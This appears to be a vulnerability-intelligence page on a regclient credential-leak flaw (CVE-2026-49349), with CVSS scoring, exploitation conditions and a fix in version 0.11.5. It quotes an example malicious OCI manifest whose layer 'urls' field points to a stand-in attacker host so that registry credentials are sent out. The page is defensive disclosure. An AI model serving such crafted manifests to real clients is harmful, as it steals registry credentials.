regclient CVE-2026-49349
MEDIUMSeverity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
Network-delivered via crafted manifest (AV:N), attacker needs registry control (PR:L), victim must pull image (UI:R), credentials exfiltrated outside originating security domain (S:C), full secret disclosure (C:H), no integrity or availability impact.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.
Example attack
A malicious registry serves an OCI image manifest containing a layer descriptor with a urls field pointing to an attacker controlled host:
{
"mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"digest": "sha256:...",
"size": 1024,
"urls": ["https://malicious.example.org/blobs/sha256/..."]
}When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.
Timeline
- 2026-05-25: Advisory submitted
- 2026-05-26: Fix released
Credit
Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security
AnalysisAI
Registry credential leakage in regclient (Go OCI library) versions up to and including 0.11.4 exposes authentication secrets to attacker-controlled external servers via crafted OCI image manifests. When regclient fetches a blob layer and the primary registry request fails, it falls back to external URLs defined in the manifest's layer descriptor urls field; if the external server issues an HTTP authentication challenge, regclient forwards the original registry credentials to that host. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires all of the following: (1) the victim must be using regclient version 0.11.4 or earlier - other OCI client implementations are not affected; (2) the attacker must control a malicious registry server, a malicious blob store, or a legitimate registry that does not restrict external URLs in layer descriptor `urls` fields; (3) the victim must actively pull an OCI image from that registry (UI:R per CVSS), which triggers regclient's blob fetch logic; (4) the primary blob fetch to the originating registry must fail, activating the `urls` fallback path; and (5) the attacker's external server must issue an HTTP authentication challenge to cause credential forwarding. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 6.8 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N) accurately reflects the key risk dimensions. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who controls a malicious container registry publishes an OCI image manifest in which a layer descriptor includes a `urls` field pointing to an attacker-operated HTTPS server. When a developer or automated CI/CD pipeline using regclient <= 0.11.4 pulls that image, regclient attempts the primary blob fetch from the registry; if the registry causes that fetch to fail, regclient follows the fallback URL. … |
| Remediation | Upgrade regclient to version 0.11.5 or later, which addresses the credential leakage by restricting credential forwarding to the originating registry domain. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-522 – Insufficiently Protected Credentials
View allSame technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-qvqc-4c52-x6qp